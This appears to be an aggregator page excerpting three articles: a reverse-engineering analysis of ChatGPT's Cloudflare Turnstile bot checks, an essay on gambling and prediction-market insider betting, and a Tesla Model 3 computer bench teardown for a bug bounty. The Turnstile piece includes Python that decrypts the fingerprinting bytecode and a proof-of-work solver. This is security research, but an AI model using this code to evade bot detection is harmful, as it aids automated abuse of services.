Initially I assumed this key was derived from performance.now() and was truly ephemeral. Then I looked at the bytecode more carefully and found the key sitting in the instructions:

[41.02, 0.3, 22.58, 12.96, 97.35]

The last argument, 97.35, is the XOR key. A float literal, generated by the server, embedded in the bytecode it sent to the browser. I verified this across 50 requests. Every time, the float from the instruction decrypts the inner blob to valid JSON. 50 out of 50.

The full decryption chain requires nothing beyond the HTTP request and response:

1. Read p from the prepare request

2. Read turnstile.dx from the prepare response

3. XOR(base64decode(dx), p) → outer bytecode

4. Find the 5-arg instruction after the 19KB blob → last arg is the key

5. XOR(base64decode(blob), str(key)) → inner program (417-580 VM instructions)

The key is in the payload.
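Put together, the whole chain fits in a short Python sketch. This is a minimal reconstruction under assumptions: it treats the decoded outer payload as a JSON array of instruction arrays, and the 10,000-character threshold for spotting the 19KB blob is illustrative, not the exact wire format.

```python
import base64
import json

def xor_decode(data: bytes, key: str) -> bytes:
    # Repeating-key XOR; encryption and decryption are the same operation.
    k = key.encode()
    return bytes(data[i] ^ k[i % len(k)] for i in range(len(data)))

def decrypt_turnstile(dx: str, p_token: str) -> list:
    # Steps 1-3: the outer layer is XOR'd with the p token from the prepare request.
    outer = json.loads(xor_decode(base64.b64decode(dx), p_token))
    # Step 4: find the large base64 blob, then the 5-argument instruction
    # after it; its last argument is the inner XOR key (e.g. 97.35).
    blob_idx = next(i for i, ins in enumerate(outer)
                    if isinstance(ins[-1], str) and len(ins[-1]) > 10_000)
    key = next(ins[-1] for ins in outer[blob_idx + 1:] if len(ins) == 5)
    # Step 5: the inner program is XOR'd with the string form of that float.
    return json.loads(xor_decode(base64.b64decode(outer[blob_idx][-1]), str(key)))
```

Because repeating-key XOR is its own inverse, the same helper also re-encrypts, which makes the chain easy to verify round-trip against a synthetic payload.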

Each inner program uses a custom VM with 28 opcodes (ADD, XOR, CALL, BTOA, RESOLVE, BIND_METHOD, JSON_STRINGIFY, etc.) and randomized float register addresses that change per request. I mapped the opcodes from the SDK source (sdk.js, 1,411 lines, deobfuscated).
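For intuition, here is a toy dispatcher in that style. It is a sketch, not the real VM: symbolic opcode names stand in for Turnstile’s numeric encodings, and only three of the 28 opcodes are modeled.

```python
import json

def run(program, regs=None):
    # Toy register VM: float "addresses" index a register file, and each
    # instruction is (opcode, destination, *operands). A float operand that
    # names a known register is read from it; anything else is a literal.
    regs = {} if regs is None else regs
    ops = {
        "ADD": lambda a, b: a + b,
        "XOR": lambda a, b: int(a) ^ int(b),
        "JSON_STRINGIFY": lambda a: json.dumps(a),
    }
    for op, dst, *args in program:
        vals = [regs[a] if isinstance(a, float) and a in regs else a
                for a in args]
        regs[dst] = ops[op](*vals)
    return regs
```

A program like [("ADD", 3.99, 2, 3), ("XOR", 74.43, 3.99, 1)] leaves 5 in register 3.99 and 4 in register 74.43; randomizing those float addresses per request, as Turnstile does, defeats naive signature matching on the bytecode.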

The program collects 55 properties. No variation across 377 samples. All 55, every time, organized into three layers:

Storage (5): storage, quota, estimate, setItem, usage. Also writes the fingerprint to localStorage under key 6f376b6560133c2c for persistence across page loads.

These are injected server-side by Cloudflare’s edge. They exist only if the request passed through Cloudflare’s network. A bot making direct requests to the origin server or running behind a non-Cloudflare proxy will produce missing or inconsistent values.

This is the part that matters. __reactRouterContext is an internal data structure that React Router v6+ attaches to the DOM. loaderData contains the route loader results. clientBootstrap is specific to ChatGPT’s SSR hydration.

These properties only exist if the ChatGPT React application has fully rendered and hydrated. A headless browser that loads the HTML but doesn’t execute the JavaScript bundle won’t have them. A bot framework that stubs out browser APIs but doesn’t actually run React won’t have them.

This is bot detection at the application layer, not the browser layer.

After collecting all 55 properties, the program hits a 116-byte encrypted blob that decrypts to 4 final instructions:

[96.05, 3.99, 3.99],   // JSON.stringify(fingerprint)

[22.58, 46.15, 57.34], // store

[33.34, 3.99, 74.43],  // XOR(json, key)

[1.51, 56.88, 3.99]    // RESOLVE → becomes the token

The fingerprint is JSON.stringify’d, XOR’d, and resolved back to the parent. The result is the OpenAI-Sentinel-Turnstile-Token header sent with every conversation request.

Turnstile is one of three challenges. The other two:

Signal Orchestrator (271 instructions): Installs event listeners for keydown, pointermove, click, scroll, paste, and wheel. Monitors 36 window.__oai_so_* properties tracking keystroke timing, mouse velocity, scroll patterns, idle time, and paste events. A behavioral biometric layer running underneath the fingerprint.

Proof of Work (25-field fingerprint + SHA-256 hashcash): Difficulty is uniform random (400K-500K), 72% solve under 5ms. Includes 7 binary detection flags (ai, createPRNG, cache, solana, dump, InstallTrigger, data), all zero across 100% of 100 samples. The PoW adds compute cost but is not the real defense.
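The exact PoW predicate isn’t published here, but a generic SHA-256 hashcash loop, the family named above, looks like this. The challenge string and the difficulty-to-target mapping are assumptions for illustration.

```python
import hashlib
import itertools

def solve_pow(challenge: str, difficulty: int) -> int:
    # Hashcash-style search: try nonces until the SHA-256 digest, read as a
    # 256-bit integer, falls below a target derived from the difficulty.
    # Higher difficulty -> smaller target -> more expected iterations.
    target = (1 << 256) // difficulty
    for nonce in itertools.count():
        digest = hashlib.sha256(f"{challenge}{nonce}".encode()).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce
```

With target = 2^256 // difficulty, the expected number of attempts is roughly the difficulty itself; whether Turnstile’s 400K-500K value maps to a target this way is an assumption, but it matches the “compute cost, not real defense” characterization above.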

The XOR key for the inner program is a server-generated float embedded in the bytecode. Whoever generated the turnstile.dx knows the key. The privacy boundary between the user and the system operator is a policy decision, not a cryptographic one.

The obfuscation serves real operational purposes: it hides the fingerprint checklist from static analysis, prevents the website operator (OpenAI) from reading raw fingerprint values without reverse-engineering the bytecode, makes each token unique to prevent replay, and allows Cloudflare to change what the program checks without anyone noticing.

But the “encryption” is XOR with a key that’s in the same data stream. It prevents casual inspection. It does not prevent analysis.

No systems were accessed without authorization. No individual user data is disclosed. All traffic was observed from consented participants. The Sentinel SDK was beautified and manually deobfuscated. All decryption was performed offline using Python.

...

Read the original on www.buchodi.com »

8 875 shares, 36 trendiness

Rod Prazeres Astrophotography in Project Hail Mary End Credits

...

Read the original on rpastro.square.site »

9 859 shares, 27 trendiness

We Haven’t Seen the Worst of What Gambling and Prediction Markets Will Do to America

Here are three stories about the state of gambling in America.

In November 2025, two pitchers for the Cleveland Guardians, Emmanuel Clase and Luis Ortiz, were charged in a conspiracy for “rigging pitches.” Frankly, I had never heard of rigged pitches before, but the federal indictment describes a scheme so simple that it’s a miracle that this sort of thing doesn’t happen all the time. Three years ago, a few corrupt bettors approached the pitchers with a tantalizing deal: (1) We’ll bet that certain pitches will be balls; (2) you throw those pitches into the dirt; (3) we’ll win the bets and give you some money.

The plan worked. Why wouldn’t it? There are hundreds of pitches thrown in a baseball game, and nobody cares about one bad pitch. The bets were so deviously clever because they offered enormous rewards for bettors and only incidental inconvenience for players and viewers. Before their plan was snuffed out, the fraudsters won $450,000 from pitches that not even the most ardent Cleveland baseball fan would ever remember the next day. Nobody watching America’s pastime could have guessed that they were witnessing a six-figure fraud.

On the morning of February 28th, someone logged onto the prediction market website Polymarket and made an unusually large bet. This bet wasn’t placed on a baseball game. It wasn’t placed on any sport. This was a bet that the United States would bomb Iran on a specific day, despite extremely low odds of such a thing happening.

A few hours later, bombs landed in Iran. This one bet was part of a $553,000 payday for a user named “Magamyman.” And it was just one of dozens of suspicious, perfectly-timed wagers, totaling millions of dollars, placed in the hours before a war began.

It is almost impossible to believe that, whoever Magamyman is, he didn’t have inside information from members of the administration. The term war profiteering typically refers to arms dealers who get rich from war. But we now live in a world not only where online bettors stand to profit from war, but also where key decision makers in government have the tantalizing option to make hundreds of thousands of dollars by synchronizing military engagements with their gambling position.

On March 10, several days into the Iran War, the journalist Emanuel Fabian reported that a warhead launched from Iran struck a site outside Jerusalem.

Meanwhile on Polymarket, users had placed bets on the precise location of missile strikes on March 10. Fabian’s article was therefore poised to determine payouts of $14 million in betting. As The Atlantic’s Charlie Warzel reported, bettors encouraged him to rewrite his story to produce the outcome that they’d bet on. Others threatened to make his life “miserable.”

A clever dystopian novelist might conceive of a future where poorly paid journalists for news wires are offered six-figure deals to report fictions that cash out bets from online prediction markets. But just how fanciful is that scenario when we have good reason to believe that journalists are already being pressured, bullied, and threatened to publish specific stories that align with multi-thousand dollar bets about the future?

Put it all together: rigged pitches, rigged war bets, and attempts to rig wartime journalism. Without context, each story would sound like a wacky conspiracy theory. But these are not conspiracy theories. These are things that have happened. These are conspiracies—full stop.

“If you’re not paranoid, you’re not paying attention” has historically been one of those bumper stickers you find on the back of a car with so many other bumper stickers that you worry for the sanity of its occupants. But in this weird new reality where every event on the planet has a price, and behind every price is a shadowy counterparty, the jittery gambler’s paranoia—is what I’m watching happening because somebody more powerful than me bet on it?—is starting to seem, eerily, like a kind of perverse common sense.

What’s remarkable is not just the fact that online sports books have taken over sports, or that betting markets have metastasized in politics and culture, but the speed with which both have taken place.

For most of the last century, the major sports leagues were vehemently against gambling, as the Atlantic staff writer McKay Coppins explained in his recent feature. In 1992, NFL commissioner Paul Tagliabue told Congress that “nothing has done more to despoil the games Americans play and watch than widespread gambling on them.” In 2012, NBA commissioner David Stern loudly threatened New Jersey Gov. Chris Christie for signing a bill to legalize sports betting in the Garden State, reportedly screaming, “we’re going to come after you with everything we’ve got.”

So much for that. Following the 2018 Supreme Court decision Murphy vs. NCAA, sports gambling was unleashed into the world, and the leagues haven’t looked back. Last year, the NFL saw $30 billion gambled on football games, and the league itself made half a billion dollars in advertising, licensing, and data deals.

Nine years ago, Americans bet less than $5 billion on sports. Last year, that number rose to at least $160 billion. Big numbers mean nothing to me, so let me put that statistic another way: $5 billion is roughly the amount Americans spend annually at coin-operated laundromats, and $160 billion is nearly what Americans spent last year on domestic airline tickets. So, in a decade, the online sports gambling industry will have risen from the level of coin laundromats to rival the entire airline industry.

And now here come the prediction markets, such as Polymarket and Kalshi, whose combined 2025 revenue came in around $50 billion. “These predictive markets are the logical endpoint of the online gambling boom,” Coppins told me on my podcast Plain English. “We have taught the entire American population how to gamble with sports. We’ve made it frictionless and easy and put it on everybody’s phone. Why not extend the logic and culture of gambling to other segments of American life?” He continued:

Why not let people gamble on who’s going to win the Oscar, when Taylor Swift’s wedding will be, how many people will be deported from the United States next year, when the Iranian regime will fall, whether a nuclear weapon will be detonated in the year 2026, or whether there will be a famine in Gaza? These are not things that I’m making up. These are all bets that you can make on these predictive markets.

Indeed, why not let people gamble on whether there will be a famine in Gaza? The market logic is cold and simple: More bets means more information, and more informational volume is more efficiency in the marketplace of all future happenings. But from another perspective—let’s call it, baseline morality?—the transformation of a famine into a windfall event for prescient bettors seems so grotesque as to require no elaboration. One imagines a young man sending his 1099 documents to a tax accountant the following spring: “right, so here are my dividends, these are the cap gains, and, oh yeah, here’s my $9,000 payout for totally nailing when all those kids would die.”

It is a comforting myth that dystopias happen when obviously bad ideas go too far. Comforting, because it plays to our naive hope that the world can be divided into static categories of good versus evil and that once we stigmatize all the bad people and ghettoize all the bad ideas, some utopia will spring into view. But I think dystopias more likely happen because seemingly good ideas go too far. “Pleasure is better than pain” is a sensible notion, and a society devoted to its implications created Brave New World. “Order is better than disorder” sounds alright to me, but a society devoted to the most grotesque vision of that principle takes us to 1984. Sports gambling is fun, and prediction markets can forecast future events. But extended without guardrails or limitations, those principles lead to a world where ubiquitous gambling leads to cheating, cheating leads to distrust, and distrust leads ultimately to cynicism or outright disengagement.

“The crisis of authority that has kind of already visited every other American institution in the last couple of decades has arrived at professional sports,” Coppins said. Two-thirds of Americans now believe that professional athletes sometimes change their performance to influence gambling outcomes. “Not to overstate it, but that’s a disaster,” he said. And not just for sports.

There are four reasons to worry about the effect of gambling in sports and culture.

The first is the risk to individual bettors. Every time we create 1,000 new gamblers, we create dozens of new addicts and a handful of new bankruptcies. As I’ve reported, there is evidence that about one in five men under 25 is on the spectrum of having a gambling problem, and calls to the National Problem Gambling Helpline have roughly tripled since sports gambling was broadly legalized in 2018. Research from UCLA and USC found that bankruptcies increased by 10 percent in states that legalized online sports betting between 2018 and 2023. People will sometimes ask me what business I have worrying about online gambling when people should be free to spend their money however they like. My response is that wise rules place guardrails around economic activity with a certain rate of personal harm. For alcohol, we have licensing requirements, minimum drinking ages, boundaries around hours of sale, and rules about public consumption. As alcohol consumption is declining among young people, gambling is surging; Gen Z has replaced one (often fun) vice with a meaningful chance of addiction with another (often fun) vice with a meaningful chance of addiction. But whereas we have centuries of experience curtailing excessive drinking with rules and customs, we are currently in a free-for-all era of gambling.

The second risk is to individual players and practitioners. One reason why sports commissioners might have wanted to keep gambling out of their business is that gambling turns some people into complete psychopaths, and that’s not a very nice experience for folks on the receiving end of gambling-afflicted psychopaths. In his feature, McKay Coppins reports on the experience of Caroline Garcia, a top-ranked tennis player, who said she received torrents of abusive messages from gamblers both for losing games and for winning games. “This has become a very common experience for athletes at the professional level, even at the college level too,” Coppins said. As the experience of journalist Emanuel Fabian shows, gambling can turn ordinary people into mini mob bosses, who go around threatening players and practitioners who they believe are costing them thousands of dollars.

The third risk is to the integrity of sports—or any other institution. At the end of 2025, in addition to its indictment of the Cleveland Guardians pitchers, the FBI announced 30 arrests involving gambling schemes in the NBA. This cavalcade of arrests has dramatically reduced trust in sports. Two-thirds of Americans now believe that professional athletes change their performance to influence gambling outcomes. It does not require extraordinary creativity to imagine how this principle could extend to other domains and institutions. If more people start to believe that things only happen in the world as a direct result of shadowy interests in vast betting markets, it’s going to be a permanent open season for conspiracy theories.

The ultimate risk is almost too dark to contemplate in much detail. As the logic and culture of casinos moves from sports to politics, the scandals that have visited baseball and basketball might soon arrive in politics. Is it really so unbelievable that a politician might tip off a friend, or assuage an enemy, by giving them inside information that would allow them to profit on betting markets? Is it really so incredible to believe that a government official would try to align policy with a betting position that stood to earn them, or an allied group, hundreds of thousands of dollars? That is what a “rigged pitch” in politics would look like. It’s not just wagering on a policy outcome that you suspect will happen. It’s changing policy outcomes based on what can be wagered.

Gambling is flourishing because it meets the needs of our moment: a low-trust world, where lonely young people are seeking high-risk opportunities to launch them into wealth and comfort. In such an environment, financialization might seem to be the last form of civic participation that feels honest to a large portion of the country. Voting is compromised, and polling is manipulated, and news is algorithmically curated. But a bet settles. A game ends. There is comfort in that. In an uncertain and illegible world, it doesn’t get much more certain and legible than this: You won, or you lost.

A 2023 Wall Street Journal poll found that Americans are pulling away from practically every value that once defined national life—patriotism, religion, community, family. Young people care less than their parents about marriage, children, or faith. But nature, abhorring a vacuum, is filling the moral void left by retreating institutions with the market. Money has become our final virtue.

I often find myself thinking about the philosopher Alasdair MacIntyre, who argued in the introduction of After Virtue that modernity had destroyed the shared moral language once supplied by traditions and religion, leaving us with only the language of individual preference. Virtue did not disappear, I think, so much as it died and was reincarnated as the market. It is now the market that tells us what things are worth, what events matter, whose predictions are correct, who is winning, who counts. Money has, in a strange way, become the last moral arbiter standing—the final universal language that a pluralistic, distrustful, post-institutional society can use to communicate with itself.

As this moral vocabulary scales across culture, it also corrodes culture. In sports, when you have money on a game, you’re not rooting for a team. You’re rooting for a proposition. The social function of fandom—shared identity, inherited loyalty, something larger than yourself—dissolves into individual risk. In politics, I fear the consequences will be worse. Prediction markets can be useful for those who want to know the future, but their utility recruits participants into a relationship with the news cycle that is adversarial, and even misanthropic. A young man betting on a terrorist attack or a famine is not acting as a mere concerned citizen whose participation improves the efficiency of global prediction markets. He’s just a dude, on his phone, alone in a room, choosing to root for death.

If that doesn’t bother you, I don’t know how to make it bother you. Based on economic and market efficiency principles alone, this young man’s behavior is defensible. But there is morality outside of markets. There is more to life than the efficiency of information networks. But will we rediscover it, any time soon? Don’t bet on it.

...

Read the original on www.derekthompson.org »

10 833 shares, 31 trendiness

Running Tesla Model 3's Computer on My Desk Using Parts From Crashed Cars

Tesla runs a bug bounty pro­gram that in­vites re­searchers to find se­cu­rity vul­ner­a­bil­i­ties in their ve­hi­cles. To par­tic­i­pate, I needed the ac­tual hard­ware, so I started look­ing for Tesla Model 3 parts on eBay. My goal was to get a Tesla car com­puter and touch­screen run­ning on my desk, boot­ing the car’s op­er­at­ing sys­tem.

The car computer consists of two parts - the MCU (Media Control Unit) and the autopilot computer (AP), layered on top of each other. In the car, the computer is located in front of the passenger seat, roughly behind the glovebox. The part itself is the size of an iPad and the thickness of a ~500-page book, and is covered in a water-cooled metal casing:

By searching for “Tesla Model 3 MCU” on eBay, I found quite a lot of results in the $200 - $300 USD price range. Looking at the listings, I found that many of these sellers are “salvaging” companies who buy crashed cars, take them apart, and list all the parts for sale individually. Sometimes they even include a photo of the original crashed car and a way to filter their listings for parts extracted from the same vehicle.

To boot the car up and interact with it, I needed a few more things:

* A power supply

* The Model 3 touchscreen

* The display cable to connect them together

For the power supply, I went with an adjustable 0-30V model from Amazon. There were 5 A and 10 A versions available; at the time, I figured it was safer to have some headroom and went with the 10 A one. That turned out to be a very good decision, as the full setup could consume up to 8 A at peak. The Model 3 screens were surprisingly expensive on eBay; I assume that is because they are a popular part to replace. I found a pretty good deal for 175 USD.
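The supply sizing above is simple arithmetic, using the numbers from this paragraph (a ~12 V nominal input, an observed 8 A peak draw, and the 10 A supply I bought):

```python
# Rough power-budget check for the desk setup. Values are from the
# article: ~12 V input, up to 8 A at peak, 10 A supply chosen.
def headroom(supply_amps: float, peak_amps: float) -> float:
    """Return the remaining current headroom in amperes."""
    return supply_amps - peak_amps

peak_watts = 12.0 * 8.0       # ~96 W at peak draw
print(peak_watts)             # 96.0
print(headroom(10.0, 8.0))    # 2.0 A to spare; the 5 A supply would have been maxed out
```

With only 2 A of headroom at peak, the 5 A version would not have been enough.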

The last and most difficult part to order was the cable which connects the MCU to the screen. I needed this because both the computer and the screen were being sold with their cables cut a few centimeters after the connector (interestingly, most sellers did that instead of just unplugging the cables).

This is when I discovered that Tesla publishes the wiring diagrams (the “Electrical Reference”) for all of its cars publicly. On their service website, you can look up a specific car model, search for a component (such as the display), and it will show you exactly how the part should be wired up, what cables/connectors are used, and even what the different pins inside a single connector are responsible for:

Turns out the display uses a 6-pin cable (2 pins for 12V and ground, 4 for data) with a special Rosenberger 99K10D-1D5A5-D connector. I soon discovered that unless you are a car manufacturer ordering in bulk, there is no way you are buying a single Rosenberger cable like this. No eBay listings, nothing on AliExpress, essentially no search results at all.

After digging around a bit, I found that this cable is very similar to a more widely available automotive LVDS cable, which is used to transfer video in BMW cars. At first sight, the connectors looked like a perfect match for my Rosenberger, so I placed an order:

The computer arrived first. To attempt to power it on, I looked up which pin of which connector I needed to attach 12V and ground to, using the Tesla schematics and the few pictures online of people doing the same desk-MCU setup. Since the computer came with the cut cable stubs still attached, I was able to strip the relevant wires and attach the power supply's clips to the right ones:

I saw a cou­ple of red LEDs start flash­ing, and the com­puter started up! Since I had no screen yet, there were not many ways to in­ter­act with the car. Reading @lewurm’s pre­vi­ous re­search on GitHub I knew that, at least in older car ver­sions, there was a net­work in­side the car, with some com­po­nents hav­ing their own web­server. I con­nected an Ethernet ca­ble to the port next to the power con­nec­tor and to my lap­top.

This network does not have DHCP, so you have to set your IP address manually. The IP you select has to be in 192.168.90.X/24, and should be higher than 192.168.90.105 so it does not conflict with other hosts on the network. On Reddit, I found the contents of an older /etc/hosts file from a car, which shows the hosts that are normally associated with specific IPs:
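A quick sketch of that address selection, using only the constraints above (the /24 subnet and the .105 cutoff are from the article; the car's exact host list may vary by software version):

```python
import ipaddress

# Pick a static IP for the laptop on the car's internal network.
# Addresses up to 192.168.90.105 are used by the car's own components,
# so we take the first host address above that cutoff.
def pick_static_ip(last_reserved: str = "192.168.90.105") -> str:
    net = ipaddress.ip_network("192.168.90.0/24")
    floor = ipaddress.ip_address(last_reserved)
    for host in net.hosts():
        if host > floor:
            return str(host)
    raise RuntimeError("no free address in subnet")

print(pick_static_ip())  # 192.168.90.106
```

On Linux, you would then assign it with something like `sudo ip addr add 192.168.90.106/24 dev eth0` (interface name depends on your machine).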

@lewurm's blog mentioned that SSH on port :22 and a webserver on :8080 were open on 192.168.90.100, the MCU. Was this still the case on newer models? Yes!
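Checking this yourself is a two-port TCP probe. The host and ports below are the ones from @lewurm's research; run it with your laptop already configured on the bench network:

```python
import socket

# Probe the two services documented on the MCU (192.168.90.100:22 and :8080).
def probe(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

for port in (22, 8080):
    state = "open" if probe("192.168.90.100", port) else "closed"
    print(f"192.168.90.100:{port} is {state}")
```

Without the MCU attached, both ports will simply report closed.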

I had already found two services to explore on the MCU:

* An SSH server which states “SSH allowed: vehicle parked” - quite funny given the circumstances

This SSH server re­quires spe­cially signed SSH keys which only Tesla is sup­posed to be able to gen­er­ate.

Interestingly, Tesla offers a “Root access program” as part of their bug bounty program. Researchers who find at least one valid “rooting” vulnerability will receive a permanent SSH certificate for their own car, allowing them to log in as root and continue their research further. A nice perk, as it is much easier to find additional vulnerabilities once you are on the inside.

* A REST-like API on :8080 which returned a history of “tasks”

This service is called ODIN (On-Board Diagnostic Interface Network), and is intentionally exposed to be used by Tesla's diagnostics tool, “Toolbox”.
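Poking at ODIN from the bench network is an ordinary HTTP exchange. The host and port are from the paragraph above, but the endpoint paths are not documented here, so the `/tasks` path in the commented example is purely a hypothetical placeholder:

```python
import json
import urllib.request

# The ODIN webserver on the MCU, per the article's network findings.
ODIN_BASE = "http://192.168.90.100:8080"

def get_json(path: str, timeout: float = 5.0):
    """Fetch a path from the ODIN webserver and decode the JSON body."""
    with urllib.request.urlopen(ODIN_BASE + path, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))

# Example, requires the live MCU on the bench network
# ("/tasks" is a hypothetical endpoint name):
# print(get_json("/tasks"))
```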

Around this time, I also re­moved the metal shield­ing to see ex­actly what the boards look like in­side. You can see the two dif­fer­ent boards which were stacked on top of each other:

Once the screen and the BMW LVDS cable arrived, it unfortunately became clear that the connector was not going to fit. The BMW connector was much thicker on the sides, and it was not possible to plug it into the screen. This led to some super sketchy improvised attempts to strip the two original “tail” cables from the MCU and the screen and connect the individual wires together. The wires were really sensitive and thin. The setup worked for a couple of seconds, but caused wire debris to fall on the PCB and short it, burning one of the power controller chips:

It was ex­tremely hard to find the name/​model of the chip that got burned, es­pe­cially since part of the text printed on it had be­come un­read­able due to the dam­age. To be able to con­tinue with the pro­ject, I had to or­der a whole other car com­puter.

In the meantime, my friend Yasser (@n3r0li) somehow pulled off the impossible and identified it as the “MAX16932CATIS/V+T” step-down controller, responsible for converting power down to lower voltages. We ordered the chip and took the board to a local PCB repair shop, where they successfully replaced it and fixed the MCU. Now I had two computers to work with.

So I re­ally did need that Rosenberger ca­ble, there was no get­ting around it.

After hav­ing no luck find­ing it on­line and even vis­it­ing a Tesla ser­vice cen­ter in London (an odd en­counter, to say the least), I had to ac­cept what I had been try­ing to avoid: buy­ing an en­tire Dashboard Wiring Harness.

Back in the Tesla Electrical Reference, in addition to the connectors, one can find every part number. Looking at the cable which connects the MCU to the screen, the part number 1067960-XX-E shows up. Searching for it on eBay brings up this monstrosity:

Turns out that actual cars don't have individual cables. Instead, they have these big “looms”, which bundle many cables from a nearby area into a single harness. This is the reason why I could not find the individual cable earlier: they simply don't manufacture it. Unfortunately, I had no other choice but to buy the entire loom for 80 USD.

Despite how bulky it was, the loom worked per­fectly. The car booted, the touch screen started up, and I had a work­ing car com­puter on my desk, run­ning the car’s op­er­at­ing sys­tem!

Having the sys­tem run­ning, I can now start play­ing with the user in­ter­face, in­ter­act­ing with the ex­posed net­work in­ter­faces, ex­plor­ing the CAN buses, and per­haps even at­tempt­ing to ex­tract the firmware.

...

Read the original on bugs.xdavidhu.me »
